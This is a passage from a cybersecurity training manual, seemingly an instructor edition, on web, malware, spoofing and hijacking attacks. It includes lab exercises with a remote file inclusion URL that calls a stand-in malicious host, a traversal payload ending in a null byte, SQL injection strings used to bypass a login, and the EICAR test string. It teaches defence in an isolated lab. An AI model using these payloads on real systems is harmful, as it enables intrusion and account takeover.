CAPEC-193 and purposes. In either case, a file inclusion attack can lead to a number of security incidents, including:
ot
CAPEC-242. malicious code executing on the web server, malicious code executing on the client that accesses the
server, sensitive data leaking, or a denial of service. There are two basic types of file inclusion:
N
remote and local.

In remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web
app or website. Web software that does not exercise proper input validation is vulnerable to this
o
type of attack. An attacker could, for instance, force a parameter in a web page to call an external
malicious link that includes the compromised file. As an example, consider a page built in PHP that
D
does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT
parameter that has five different options, each one a different font type. The attacker can manipulate
this parameter to inject an option that isn't one of these five—and not only that, the attacker can
point to an external URL that contains a malicious PHP file:
/webpage.php?FONT=http://www.malice.example/malware

In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists
on the hosting server. This is often accomplished on servers vulnerable to directory traversal; the
attacker navigates through the server's file structure and executes a file. As in the directory traversal
example, an attacker could gain control over the server by opening a command prompt. A common
tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to
bypass security mechanisms that automatically add a .php suffix to the request. This enables the
attacker to access non-PHP files:
/webpage.php?FONT=../../Windows/system32/cmd.exe%00
e
Additional Web Application Vulnerabilities and Exploits
ut
The following table lists some additional web app vulnerabilities and exploits that target them. Additional Web
Application
ib
Vulnerability or Exploit Description Vulnerabilities and
Exploits
Session fixation Session fixation is forcing a user to browse a website in the context of a
tr
known and valid session. An attacker attempting a session fixation attack
needs to force an already known session onto the targeted user. To carry
is
out this attack, an attacker can manipulate the methods normally assigned
to a user, such as providing alternative inputs to web applications via
GET requests. Some web applications assign these values via GET
D
requests directly to the user's cookie for backward compatibility reasons.
An alternative, and more popular, method for carrying out a session
Session prediction
or
fixation attack is to use an XSS attack to set the session cookie directly
with a client-side scripting language such as JavaScript.
Session prediction attacks focus on identifying possible weaknesses in the
generation of session tokens that will enable an attacker to predict future
e
valid session values. If an attacker can guess the session token, then the
at
attacker can take over a session that has yet to be established.

Clickjacking Clickjacking occurs when an attacker tricks a client into clicking a web
lic
page link that is different than where they had intended to go. After the
victim clicks the link, they may be redirected to what appears to be a
legitimate page where they input sensitive information. A clickjacking
attack can also redirect a user to a malicious web page that runs harmful
up
scripts in a user's browser.

Clickjacking is often made possible by framing, which delivers web
content in HTML inline frames, or an iframe. An attacker can use an
D
iframe to make it the target of a link defined by other elements. When a

user selects the link, they could, for example, start inputting their
credentials while an invisible iframe is the one accepting the values.
ot
Cookie hijacking Because session cookies are generally configured and transmitted across
the communications channel between the client and the server as a simple
N
text file, an attacker can hijack a cookie to inject malicious code they can
use to take control of the session. Once the session is hijacked, the
attacker can propagate a DoS attack against the web app or sign in to the
o
web app using the victim's name, the client computer, or both.
D
Cookie poisoning Cookie poisoning modifies the contents of a cookie after it has been
generated and sent by the web service to the client's browser so the newly
modified cookie can be used to exploit vulnerabilities in the web app.

Web Services Exploits

Web Services Exploits A web service is any software that provides network communication between devices. Web
services typically exist as one of several protocols, including Web Services Description Language
(WSDL), Simple Object Access Protocol (SOAP), and Universal Description, Discovery, and
Integration (UDDI). These protocols provide a structure for transmitting and receiving
information used in web applications to a variety of device types.
Like the applications they service, these systems are vulnerable to a number of exploits. As they
provide the backbone to many applications that people use on a daily basis, the compromise of
e
these web services can have a significant impact on the security of your organization.
ut
Exploit Description
Probing This attack is typically a preliminary step to test web services. Essentially,
ib
the attacker relies on brute force to try to find what sort of requests web
services are vulnerable to. For example, the open nature of WSDL
tr
documentation may enable an attacker to view all of a web service's
functions. Attackers can use this information to craft every variety of
is
operation and request message that applies to the service until it reveals a
breach. The attacker can also inject special characters into a WSDL
request parameter to cause unintended behavior, like a systems crash.
D
Coercive parsing SOAP parses XML-based requests. Those requests can be modified by an
attacker so the SOAP web service parses them in a harmful way. For
or
example, a hacker can craft a payload that requests the same thing over
and over, send a single payload over and over, or craft a payload that is
excessively large to trigger a DoS condition and bring down the web
service. Intrusion countermeasures may be unable to pick up on packets
e
crafted maliciously, as the source of the packet and its XML formatting
are likely to be valid.
at
External references Poorly configured SOAP services can open the door to a number of
external-based exploits. If the SOAP documentation allows XML input
lic
from a third party, that third party can take advantage of this and cause
damage, such as using a DoS attack. Attackers can also corrupt the XML
schema, which helps parse XML requests, if that schema is stored where
up
it can be compromised. Incorrectly parsed XML can lead to a DoS

condition or a loss of data integrity.
Malware XML messages can surreptitiously include malicious software like viruses
D
and Trojan horses. Typical malware carriers like executables and

compressed files can compromise web services and proliferate through
their supporting systems, and even word processing documents or
ot
spreadsheets can include macros or other content that can cause a whole
host of problems.
SQL injection SQL statements that access, modify, or delete records in an SQL database
N
should not be transmitted over SOAP. This could enable an attacker to

compromise the confidentiality, integrity, and availability of database
o
records.
D
Web-Based Attack Tools

Web-Based Attack Tools The following are examples of popular tools that can be used to launch attacks on web-based
resources:
• sqlmap
• Metasploit Framework

• Burp Suite
• OWASP WebScarab
• OWASP ZAP
• w3af
• BeEF
• Nikto
• Paros Proxy
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 4-2
Assessing the Impact of Web-Based Threats
Data Files
e
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments
\devtech_store.sql
ut
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\devtech_site.zip
ib
Impact of Web-Based Before You Begin
Threats
An SQL-based web server has already been set up on your Windows Server machine. This web
tr
server is running with XAMPP open source software.
is
Scenario
Develetech's storefront website was unfortunately published in a hurry, and not much attention was
D
paid to securing the site. You're especially concerned that the site is vulnerable to injection attacks
on its SQL database. An attacker may be able to hijack an account in the database to deface the site
or tamper with the product data. So, you'll test the website's vulnerabilities to SQL injection to
1. Import the SQL database.

or
assess how web-based threats can compromise your organization's security.
e
a) On your Windows Server, double-click the xampp-control icon from the notification area.
at
lic
up
Note: You may need to select the Show hidden icons arrow to see the icon. If
no icon appears, select the Windows Start button, then select
XAMPP→XAMPP Control Panel.
D
b) In the XAMPP Control Panel, ensure that both Apache and MySQL are running. Both services will
have a green background and port numbers listed if they are running. If they aren't running, select
the Start button next to each service.
c) Next to MySQL, select Admin.
ot
N
o
D

d) In the phpMyAdmin console, select the Import tab.
e
ut
ib
tr
is
D
e) In the File to import section, select the Browse button.
or
e
Note: The name of this button may differ based on web browser.
at
f) From the data files, open devtech_store.sql.

lic
g) Scroll down to the bottom of the page and select Go.

h) Verify that the import was successful.
up
D
2. Review the details of the SQL database.

a) From the navigation pane on the left, select the devtech_store database.
ot
b) Verify that there are three tables in this database: categories, products, and users.
c) Select the categories table and review its data.
This table is a list of the product categories. The id column is the primary key, and the name column
N
lists the name of each product category. There are a total of nine categories.
d) From the navigation pane, select the products table and review the data.
This table is a list of all products. Each product has its own product code, description, price, and
o
whether it is in stock, and corresponds to a category from the categories table.

e) Select the users table and review its data.
D
This table is a list of users that can sign in to the website. Each user has a user name, password,
first name, last name, and permission.
3. Set up the Develetech website and navigate to it.

a) In File Explorer, from the data files, right-click devtech_site.zip and select Extract All.
b) In the Files will be extracted to this folder text box, type C:\xampp\htdocs
c) Select Extract and replace all files when prompted.

d) Open a new web browser tab and navigate to http://localhost:80.

e) Verify that you are on the Develetech Store website.
e
ut
ib
tr
is
D
4. Use a basic injection attack to dump all products in the database.
a) Select the Catalog tab.
b) Verify that all products in the Monitors category are listed in a table.
or
c) Select some of the other category navigation tabs.
The intended behavior of this page is to list only one product category at a time, depending on which
category the user wants to see.
e
d) Verify that the URL includes the query category=n, where n is the product category id you're
currently viewing.
at
lic
e) Place the insertion point at the end of the URL, and then add a space.
f) Type OR 1=1
up
D
g) Press Enter.
ot
N
o
D

h) Verify that the page is saying that it's listing products in the Monitors category, but that it's actually
listing every product in every category.
e
ut
ib
tr
is
D
i) or
In the SQL query section, examine the query that you executed with this injection.
The query selects four columns from the products table where the product category is n or where 1
equals 1. Because 1 equals 1 is always true, the page dumps every category at once.
e
at
5. Attempt to sign in to the site without the proper credentials.

a) Select the Sign In tab.
lic
b) Verify that there's a user name and password field on this page, as well as a Sign in button.
c) Attempt to sign in as user kevin with the password Pa22w0rd.
The kevin account is listed in the users table in the SQL database. Kevin has default user
permissions.
up
d) Verify that the sign in attempt failed.

D
ot
N
o
You don't know Kevin's password, and cracking it is impractical.

D
Students can select and

hold the visibility icon in
the password field to
help them see what
they're typing.

6. On the web page, look at the SQL query this attempt executed on the server.
How does the form automatically format the user name and password fields in
e
the query?
ut
A: It adds an opening and closing apostrophe for each field, encasing the field in a string literal.
7. Inject a malicious SQL statement into the sign-in form.
ib
a) Type kevin as the user name, and in the password field, type x' OR 'x'='x
As before, you're attempting to exploit an always true condition. Since you're inputting the query in a
form, you need to manipulate it with apostrophes. This is because the query will be run with its own
tr
opening and closing apostrophes, so you need to ensure the entire statement isn't enclosed in one
long string. In other words, the query should be saying: "Use x as the password. Failing that, the
is
password is a true statement."
b) Select Sign in, then verify that you are logged in, but not as Kevin.
D
or
The "always true" statement applies to every row of the users table, so it logs you in as the first user
in that table. In this case, the first user is Laura Anderson, who has administrator privileges. It's
common for the first accounts in a database of users to have administrator privileges.
e
Consider demonstrating c) In the SQL query section, verify that the query was formatted insecurely, enabling your injection
that, other than the attack to work.
at
apostrophes, the actual

characters used in this
attack aren't important.
lic
up
Your malicious query takes advantage of the default apostrophe formatting and lack of sanitized
input.
8. What are some other ways an attacker could compromise the database with
D
SQL injection?
A: Answers may vary, but the attacker could drop entire tables, edit individual row entries, dump the
contents of the members table to see more user login information, and even log in as specific
ot
users.
How would you defend against this type of attack?

N
9.
A: Answers may vary, but one of the most common and useful tactics to deal with SQL injection is
the use of parameterized queries, also known as prepared statements. The quotation marks in the
o
sign-in injection, for example, would be interpreted literally if the query were parameterized.
D
10.Close the browser.

TOPIC C
Assess the Impact of Malware
You've considered how your systems will deal with the threat of system hacking attacks and attacks
that target web apps and websites. Now you'll examine the threat of malicious software, which, if
you're unprepared, can bring swift and devastating harm to your systems.
e
ut
Malware Categories
Malicious software, or malware, comes in a variety of forms. Malware Categories
ib
Inform students that
Malware Type Description modern malware often
uses combined attack
tr
Virus A piece of code that spreads from one computer to another by attaching approaches that span
itself to other files through a process of replication. Viruses require multiple categories.
is
human intervention to spread. The code in a virus executes when the file
it is attached to is opened.
D
Worm Like a virus, a worm replicates across the infected system. However,
unlike a virus, it does not require human intervention and can replicate
itself. Also, it does not attach itself to other programs or files.
Adware
Spyware
advertisements when it is used. or
Software that automatically displays or downloads unsolicited
Surreptitiously installed malicious software that is intended to track and

e
report the usage of a target system or collect other data the author wishes
at
to obtain.
Trojan horse Hidden malware that causes damage to a system or gives an attacker a
platform for monitoring and/or controlling a system. Trojans typically
lic
appear as benign software, but also include malicious code. Unlike

viruses, Trojans do not replicate themselves, nor do they attach to other
files.
up
Rootkit Code that is intended to take full or partial control of a system at the
lowest levels. Rootkits often hide themselves from system processes,
running invisibly.
D
Logic bomb A piece of code that sits dormant on a target computer until it is triggered
by a specific event, such as a specific date. Once the code is triggered, the
ot
logic bomb detonates, and performs whatever actions it was programmed

to do.
Ransomware Code that restricts the victim's access to their computer or the data on it.
N
The attacker then demands a ransom be paid, usually through a

cryptocurrency like Bitcoin that is difficult to trace, under threat of
keeping the restriction, destroying the information they have locked
o
down, or exposing the information publicly.

D
Malvertisement Malicious code delivered through advertisements, particularly those that

are web based, like pop-ups, banners, and front-loaded videos. Because
these ads often include dynamic web content like JavaScript, they can
easily infect a client's browser even if the ad isn't clicked.
Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic C

Trojan Techniques
Trojan Techniques Trojans are insidious and remain undetected much more easily than a typical virus. They are usually
Inform students that propagated by social engineering, such as when a user downloads an email attachment that claims to
botnets will be covered be benign, but is actually malignant. Even seasoned IT professionals fall victim to Trojan horse
in an upcoming topic. deceptions. For example, you might search online for a PowerShell script to help you accomplish
some domain user management task. Although it's common to reuse code, unless you trust the
source of the script and can actually take the time to evaluate the code itself, you may fall prey to a
Trojan—even if the script works as advertised.
e
Trojans may also be packaged in drive-by downloads, where a user unwittingly downloads the
ut
malicious code along with what they think is legitimate software.
Trojans can have many purposes. Some are meant to simply deny service to a user by crashing or
locking up their computer, whereas others delete or corrupt data. Other Trojans can log keystrokes
ib
and intercept transmissions to steal sensitive data from a user. It's also common for Trojans to
contain bots used to turn a computer into part of a larger botnet.
tr
is
D
or
e
at
lic
up
Figure 4-7: An email message meant to trick a user into downloading a Trojan to their computer.
D
Virus and Worm Techniques

Virus and Worm Attackers inject viruses into a system the same way they insert most other types of malware—
ot
Techniques through social engineering tactics. A user may believe they're downloading or opening a legitimate
You may wish to point application, but they are also executing the virus code when they do so. Depending on how the
out that an alternate user's operating system is configured, the attacker may attempt to trick the user into opening a file
N
definition for an armored type that is typically benign (like an image), but if file types are hidden, they are actually opening an
virus is any virus that is executable file.
difficult to remove. Some
o
sources refer to viruses Viruses can reside in RAM during the duration that the computer is on, or they can infect their
that obscure their true targets without moving to memory. Some viruses are able to infect the master boot record (MBR) of
D
location as stealth an operating system or installation media. More sophisticated viruses do a better job of hiding from
viruses. users and anti-malware software. Polymorphic viruses, for instance, change their code each time
they infect a new file, making it very difficult for anti-malware to keep up. Armored viruses obscure
their true location in a system by misleading the anti-malware system into thinking it resides
elsewhere. This prevents anti-malware software from accurately detecting and removing the
infection. Likewise, armored viruses often contain obfuscated code to make it more difficult for
security researchers to properly assess and reverse engineer them.

e
ut
ib
tr
is
Figure 4-8: A virus changing its code each time it spreads to a new file.
D
Frequently, viruses are intended to enable further attacks, send data back to the attacker, or even
corrupt or destroy data. Because of their replicating nature, viruses are difficult to completely
remove from a system, and account for billions of dollars of damage every year.
or
Whereas viruses tend to interfere with the functions of a specific machine, worms are often
intended to interrupt network capabilities. A worm need not carry any sort of malicious payload at
all—its primary function is usually just to spread. The act of spreading to enough systems may
e
cripple network bandwidth. Worms that do carry payloads often turn computers into remote
zombies (bots) that an attacker can use to launch other attacks from.
at
Adware and Spyware Techniques

lic
Adware often appears on a user's computer as a browser pop-up. While not all adware is overtly Adware and Spyware
malicious, many adware programs have been associated with spyware and other types of malicious Techniques
up
software. Also, it can reduce user productivity by slowing down systems and simply being an Consider mentioning
annoyance. that some spyware is
authorized, such as
Spyware is more problematic, however. The data collected by spyware can include web browsing when an organization
history, personal information, banking and other financial information, and user names and
D
monitors the computer

passwords. This is especially true if the spyware is installed alongside a keylogger. Although it can usage of its employees.
infect a computer through social engineering tactics, some spyware is included with otherwise
ot
legitimate software.
Effective adware and spyware are designed to have little to no effect on performance so they are
more difficult to detect. However, victims who are exposed to this type of malware are often
N
infected multiple times, and the effect eventually becomes noticeable. Some types of spyware are
able to bypass anti-malware software, as well as disable software firewalls.
o
Ransomware Techniques—Vectors and Warnings

D
Unsurprisingly, social engineering techniques like phishing are the most common vector used to Ransomware
propagate a ransomware attack. The victim opens a link or attachment that downloads a Trojan Techniques—Vectors
horse onto their device, which contains the ransomware payload. Some ransomware attacks succeed and Warnings
without social engineering, such as those that enter the network through a flaw in software. In either
case, the payload can affect files directly on the local device, or it can also spread to any network
shares that are mapped on that device, causing significantly more damage to the wider organization.

Not all ransomware payloads are the same, though they usually all make themselves known to the
victim by displaying an application window warning the user their files are locked and cannot be
recovered without payment. These warnings are usually eye catching and meant to scare the victim.
They often accuse the victim of doing something embarrassing or illegal, and claim that the victim is
being punished for it (e.g., by law enforcement).
e
ut
ib
tr
is
D
or
e
at
lic
Figure 4-9: An example of what a ransom warning might look like in a ransomware payload.
Ransomware Techniques—Payloads
up
Ransomware When it comes to the payload itself, the more rudimentary attacks simply add OS-level restrictions
Techniques—Payloads to the system or files, such as changing file permissions or pointing the Windows Shell to itself.
These are more nuisances than real threats, as an experienced user can get around them. But
D
inexperienced users often can't, and therefore decide to pay the ransom. Some payloads even do
nothing—they just claim to lock a victim's files, which is enough to scare the victim into payment.
ot
More sophisticated ransomware will affect the system at a lower level, such as rewriting the master
boot record (MBR) or the boot drive's partition table to prevent the operating system from booting.
The ransom itself may then come through a different channel, like an email message that the victim
N
can read on a different device.

However, the most dangerous form of ransomware actually encrypts the user's files. The process is
as follows:
o
1. The attacker generates a public–private key pair and adds the public key to the payload. When
D
the payload executes on the victim's device, it encrypts their files with a symmetric key, which is
then encrypted by the attacker's public key.
2. The symmetric key and the original plaintext data is destroyed, leaving only the encrypted data
and a bit of asymmetric ciphertext. This asymmetric ciphertext is displayed to the victim in the
ransom message.
3. The victim sends this ciphertext, along with payment, to the attacker. The attacker uses their
private key to decrypt the ciphertext, which reveals the symmetric key.

4. The symmetric key is sent back to the victim, who uses it to decrypt their data.
e
ut
ib
tr
is
Figure 4-10: The ransomware encryption process.
D
Ransomware Techniques—Payment
or
The last factor in the ransomware process is payment. The most successful ransomware propagators
follow through on their promise to decrypt the victim's data, as it costs them very little to do so, and
simply taking the money without fulfilling their promise to decrypt would make future victims less
Ransomware
Techniques—Payment
e
likely to pay. The ransomware propagator will usually request payment in the form of a
cryptocurrency like Bitcoin, but may also allow the victim to pay through pre-paid vouchers or
at
through wire transfers that go directly to a cash office, eliminating the need for a traceable bank
account.
lic
For victims who refuse to pay, the ransomware propagator usually includes a threat to destroy the
private key if payment is not received in a timely manner, thereby keeping the victim's data
encrypted forever. Again, they may or may not follow through on this threat, though it will help
up
solidify the attacker's reputation if they do.
Supply Chain Attack

D
A supply chain attack is an attack that targets the end-to-end process of manufacturing, Supply Chain Attack
distributing, and handling goods and services. The supply chain most often starts with a company Example CAPEC IDs:
ot
that supplies raw materials to an original equipment manufacturer (OEM). The OEM or another CAPEC-442,
company then distributes the product, usually as part of a larger product suite. The product is CAPEC-444,
distributed to a vendor, who in turn sells the product to a customer, ending the chain. For example, CAPEC-447, and
N
Intel CPUs are used in Asus laptops, so Intel is considered an OEM. CAPEC-522.
Because supply chains are so crucial to normal business operations, and affect so many different
companies, an attack on the chain can have a profound ripple effect on organizations and personnel
o
further down the chain. An attacker can tamper with the devices used at the manufacturing level,
D
which impacts distribution, which impacts the vendor's ability to sell the product, which ends with
frustrated consumers and lost revenue. Common targets at the manufacturing level include industrial
control systems (ICSs), factory power systems, inventory systems, and any other computer or device
that must remain operational for the supply chain to maintain its forward momentum.
The details of an attack can differ, but most attacks involve physically tampering with devices,
hacking into them and installing malware, or both.

Note: A supply chain attack is a type of out-of-band attack, which implies that attackers use
unconventional, irregular, or indirect means to compromise an organization.
e
ut
ib
tr
Figure 4-11: A supply chain attack introducing malware at the manufacturer, which has an
increasing effect further down the chain.
is
Example Supply Chain Attacks
D
One example of a supply chain attack is Stuxnet, a worm targeting systems used in control
machinery that handles nuclear material. The worm was able to propagate through an infected USB
drive physically plugged into a system. When the machinery was put to use further down the supply
or
chain at the consumer end, the worm would overload the machinery, damaging it.
In 2013, attackers installed malware on Target's point of sale (POS) systems, enabling them to steal
millions of customers' credit card information. Investigators believe the attackers stole credentials to
e
Target's network from one of the company's HVAC suppliers. No matter how the attackers stole
the credentials, the fact they were able to compromise a supplier meant the damage was magnified
at
further down the supply chain.

The breach of government data in 2020 was believed to have started with a breach of SolarWinds, a
lic
company that supplies IT services to many government agencies. The customers who used
SolarWinds' products were likewise impacted further down the chain.
Additional Supply Chain Attacks

up
An organizational supply chain is not just vulnerable to malware-based attacks. For example,
software-based attacks like buffer overflow and command injection have also targeted supply chains.
Attacks of these types can modify the design of a product, and, as the product reaches the
D
consumer, it will be different than what was intended. Depending on the nature of the attack, these
design changes may go completely unnoticed, or they may only be apparent when the product is far
enough down the chain it cannot be entirely recalled.
ot
Malware Tools
N
Malware Tools The following are examples of popular tools attackers may use as malware:
• NetBus
o
• Sub7
D
• Back Orifice
• Zeus
• FinFisher
• MPack

ACTIVITY 4-3
Assessing the Impact of Malware
Data File
e
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\eicar.txt
ut
Before You Begin Impact of Malware
You will activate a text file on your Windows 10 client that is designed to simulate malware, but it
ib
won't harm your system.
Scenario
tr
You are growing concerned about the volume of malware undoubtedly striking Develetech as the
is
company rapidly grows. Is your anti-malware sufficient to discover these attacks? You need to
identify what the latest threats are and test your end-station anti-malware to ensure that it works
properly.
D
Examine the top malware threats in 2021 according to Sophos, a British
1.
cybersecurity firm.
a) Return to your Windows 10 client.
or
b) Open your web browser and navigate to https://www.sophos.com/en-us/medialibrary/pdfs/technical-
e
papers/sophos-2021-threat-report.pdf.
at
Note: You can also use the search site of your choice to search for sophos
2021 threat report then select the PDF from the results if you'd rather not type
lic
the full URL.

c) In the table of contents, and under THE FUTURE OF RANSOMWARE chapter, select Ransoms rise
as attacks increase.
up
d) Briefly review the ransomware information presented in this section.
2. According to Sophos, why have average ransom payouts been increasing

over the past few years?
D
A: Sophos implies that there is a hierarchy (or weight classes, to use their metaphor) to modern
ransomware attacks. Attacks on a few large corporations tend to skew the averages because
ot
these corporations can afford to pay a much larger ransom—and attackers know it. Attacks on
smaller organizations and individuals are less profitable, so those payouts tend to remain
constant.
N
3. Review common malware delivery mechanisms.

a) Return to the table of contents, and under the EVERYDAY THREATS TO ENTERPRISES –
o
CANARIES IN THE COAL MINE chapter, select Delivery mechanisms.

b) Briefly review the first malware delivery mechanism listed.
D

4. According to Sophos, what is the most common delivery mechanism for

ransomware, and why?
A: Windows' Remote Desktop Protocol (RDP) is the most common delivery mechanism for
ransomware. Attackers can gain entry into remote computers through RDP just as any user,
enabling them to spread the infection much more easily. RDP has become an even more
prominent vector in the wake of the COVID-19 pandemic as more people work from home and
need to access their computing environments remotely.
5. Review the latest malware predictions.
e
a) Open a new web browser tab.
ut
b) Navigate to the web search site of your choice and search for malware predictions for <current year
or following year>
c) From the results, select a link that provides some predictions for how malware will evolve and
ib
continue to spread.
6. Share your findings with the class.
tr
What categories of malware do security researchers believe will be
is
prominent? What new categories of malware might arise? What new or
changing delivery mechanisms and attack vectors might malware take? What
D
other predictions about malware did you discover?
A: Answers will vary greatly depending on the time when the class is taught and what web-based
or
resources you find. Ransomware will likely continue to be prominent well into the future, especially
attacks targeting the healthcare industry. Malware may take advantage of artificial intelligence (AI)
to better avoid detection and cause more harm. Malware targeting edge devices like those used in
IoT and remote work is also likely to grow in prominence.
e
7. Test your workstation anti-malware by activating the simulated malware file,
at
eicar.txt.
a) From the course data files, open eicar.txt in Notepad.
lic
b) Verify the file contains what appears to be a random string of characters.

This is the EICAR test file, and it was designed to trigger anti-malware systems without actually
being malicious. When executed as a COM file, it simply prints "EICAR-STANDARD-ANTIVIRUS-
up
TEST-FILE!" to the console. Many anti-malware vendors have agreed to incorporate this file's
signature in their products for testing purposes.
Note: For more information on EICAR, visit www.eicar.org/?page_id=3950.

D
c) In the text file, remove the opening bracket at the beginning and the closing bracket at the end of the
string.
ot
The brackets are not part of the actual "malicious" string; they were included to keep the file inert
until now. Removing the brackets reveals the true EICAR test string, which is:
N
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
d) Save the file.
e) Select the Windows notification that pops up, informing you that a threat was detected.
o
Note: If you missed the notification, select the Notification icon on the right-
D
most part of the taskbar to see it.
8. View more details about the threat.

a) In Windows Security, under Quarantined threats, select Virus:DOS/EICAR_Test_File.
Note: If Quarantined threats doesn't appear, proceed to the next step.

b) In Windows Security, under Current threats, select Protection history.

c) In the list of items, select Threat quarantined.
d) Review the details of the detected threat.
e
ut
ib
tr
is
D
or
e
at
9. What alert level did Windows Security assign the threat? What category of
malware is this file? What does quarantining a file in Windows Security do?
lic
A: Windows Security assigned this threat an alert level of Severe. The file is a virus, and Windows
Security automatically placed it in a restricted area where it can't affect the rest of the computer.
up
10.Remove the eicar.txt file.

a) From the Actions drop-down menu, select Remove.
b) Verify that Windows Security indicates the file's status is Removed or restored.
D
c) Close Windows Security and Notepad.

d) In File Explorer, verify that the eicar.txt file is no longer in the course data files folder.
ot
11.What value does this EICAR test file have in developing and testing anti-
malware systems?
N
A: Answers will vary. Though it is a bit dated, this is one method of ensuring your tool can detect
malware even when it is cloaked (for example, by being inside a ZIP file). You would usually not
want to infect your production systems with live malware, so this operates as a substitute.
o
12.Close your browser.

D

TOPIC D
Assess the Impact of Hijacking and
Impersonation Attacks
You've considered how your systems will deal with the threat of malware attacks. Now you will
e
examine the threat of spoofing, impersonation, and hijacking.
ut
Spoofing, Impersonation, and Hijacking
ib
Spoofing, Spoofing is a software-based attack where the goal is to assume the identity of a user, process,
Impersonation, and address, or other unique identifier. An attacker uses spoofing to trick both people and computers
Hijacking into believing something incorrect about the attacker's actual identity.
tr
Impersonation is a human-based attack where an attacker pretends to be someone they are not. A
common scenario is when the attacker calls a bank customer and pretends to be calling from the
is
bank's customer service department. The attacker tells the customer they are overhauling and
augmenting their security systems, and they need the customer's online banking credentials to ensure
D
their account is adequately protected. Impersonation is often successful in situations where identity
cannot be easily established. If the customer in this example doesn't know the real customer service
representative or the customer service number, they may be less inclined to question the request.
or
Session hijacking involves exploiting a computer during an active session to obtain unauthorized
access to data, services, and networks.
e
ARP Spoofing
at
ARP Spoofing Attackers may be able to spoof IP addresses and network adapter hardware (MAC) addresses. IP
address and MAC spoofing is typically accomplished through the Address Resolution Protocol
lic
(ARP), which translates IP addresses to their corresponding physical addresses (typically a MAC
address). A table of IP addresses with their corresponding MAC addresses is cached on each
network device, and may be updated on the fly. ARP spoofing, or ARP poisoning, is when an
up
attacker redirects an IP address to a MAC address that was not its intended destination. Attackers
can execute this spoofing attack by continuously sending requests to update the cache with the
erroneous address information, and because ARP will overwrite each record with the latest request,
flooding the cache with spoofed requests will make the attack more likely to succeed.
D
ot
N
o
D
Figure 4-12: ARP spoofing.
Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic D

Mitigation
There are several ways you can mitigate an ARP poisoning attack, including:
• Make the ARP tables on the relevant hosts static and unchangeable without the proper
authorization. This can be difficult to manage, especially in an environment with many potential
targets.
• Create subnets. ARP packets are contained to the local subnet, so an attacker won't be able to
poison the ARP of a host on a different subnet. They will, however, still be able to poison hosts
within the subnet.
e
• Configure an intrusion detection system (IDS) to scan for anomalous ARP cache changes,
especially changes that map multiple IP addresses to the same MAC address.
ut
• Implement port security to identify and limit the MAC addresses that are allowed access to the
network port.
ib
• Configure DHCP snooping and dynamic ARP inspection on switches to map IP addresses
requested through DHCP to ARP table entries.
tr
DNS Poisoning
is
In a DNS poisoning attack, an attacker is able to modify a Domain Name System (DNS) server's DNS Poisoning (2
cache so that it returns a fraudulent IP address to its users. Instead of users navigating to the correct Slides)
D
IP address, they are directed to an IP address that serves malware or captures input from the user.
This is effective because the user doesn't necessarily see any overt signs that they've resolved to a
fraudulent address.
or
Aside from breaking into the DNS server directly and modifying the cache, attackers can exploit
DNS servers that run outdated or otherwise vulnerable software. The following process is an
example of how vulnerable DNS servers can be poisoned:
e
1. The attacker repeatedly queries a target DNS server for the address of random-
domain.google.com.
at
2. The target DNS server, not having this subdomain cached, queries authoritative DNS servers to
answer these requests.
lic
3. The authoritative server sends a response with an NS record that refers the google.com domain
to resolution via the legitimate ns1.google.com name server (3a), but the attacker beats this
response by providing the same NS record for google.com and by pointing ns1.google.com to
up
their own malicious name server's IP address using an A record (3b).

4. The target DNS server caches both the NS and A records.
5. A user queries the target DNS server for docs.google.com (5a), and the target DNS server
queries the malicious DNS server (which the target thinks is ns1.google.com).
D
6. The malicious DNS server, which was set up to be authoritative for google.com, responds that
docs.google.com is at another IP address controlled by the attacker and which hosts a spoof
site (6a), so the user is directed to the attacker's spoof site where any credentials the user inputs
ot
are captured (6b).

N
o
D

e
ut
ib
tr
is
Figure 4-13: A DNS poisoning attack.
D
DNS Hijacking
In a DNS hijacking attack, an attacker modifies a computer's DNS configurations to point it
or
toward a rogue name server controlled by the attacker. Attackers can modify an end user's TCP/IP
configuration through malware, which switches the DNS server from automatic (using their ISP's
servers) to manual (the attacker's server). The attacker can then serve up more malware to the user,
such as adware and spyware, and even use social engineering tactics like pharming to steal the user's
e
credentials.
at
DHCP Spoofing
lic
DHCP Spoofing DHCP spoofing occurs when a host computer sends requests to a Dynamic Host Configuration
Protocol (DHCP) server to be assigned an IP address. The attacker, using a rogue DHCP server,
responds to this request before the actual DHCP server can. In this spoofed response, the attacker
up
usually claims that the default gateway's IP address is their own. This way, any messages sent from
the host will travel to the attacker in a man-in-the-middle attack.
To beat the legitimate DHCP server's response, the attacker can position themselves along a closer
D
path to their target. They can also initiate a DoS against the DHCP server at the right time to delay
or halt its response.
ot
DHCP servers can avoid spoofing by enabling DHCP snooping at the network switch; this feature
ensures that only certain switch ports are trusted, whereas all others are untrusted. Therefore, an
untrusted switch port can only send DHCP requests, and its responses will be ignored.
N
o
D

e
ut
ib
tr
is
Figure 4-14: An attacker spoofing a DHCP response.
D
Session Hijacking
or
Over a network like the Internet, session hijacking involves stealing an active session cookie that is
used to authenticate a user to a remote server, and then using that to control the session thereafter.
An attacker may use a fixed session ID and send that to a target. If the target enters the session
(usually under false pretenses), the attacker has access to the session. Attackers can also sniff
Session Hijacking
Example CVE IDs:
CVE-2016-2076,
CVE-2015-5346, and
e
network traffic to obtain session cookies sent over an unsecured network, like a public Wi-Fi CVE-2015-8124.
hotspot. Session cookies can also be hijacked through cross-site scripting (XSS) attacks. In this
at
technique, the attacker injects malicious code into a website, which can then execute on the client's
browser and steal the victim's session cookie.
lic
Session hijacking attacks may be used to execute DoS to either the client's system or the server
system, or in some cases, both systems. Attackers may also hijack sessions to access sensitive
information, like bank accounts or private communications.
up
Note: Another type of session hijacking involves predicting the sequence number in TCP packet
transmissions. However, this type of attack is less common.
D
Hijacking and Spoofing Tools

ot
The following are examples of popular tools attackers may use to hijack sessions or impersonate Hijacking and Spoofing
users and computers. Tools
N
Spoofing tools
• hping
• Nmap®
o
• Cain & Abel

D
• Ettercap
• Nemesis
Session hijacking tools
• CookieCatcher
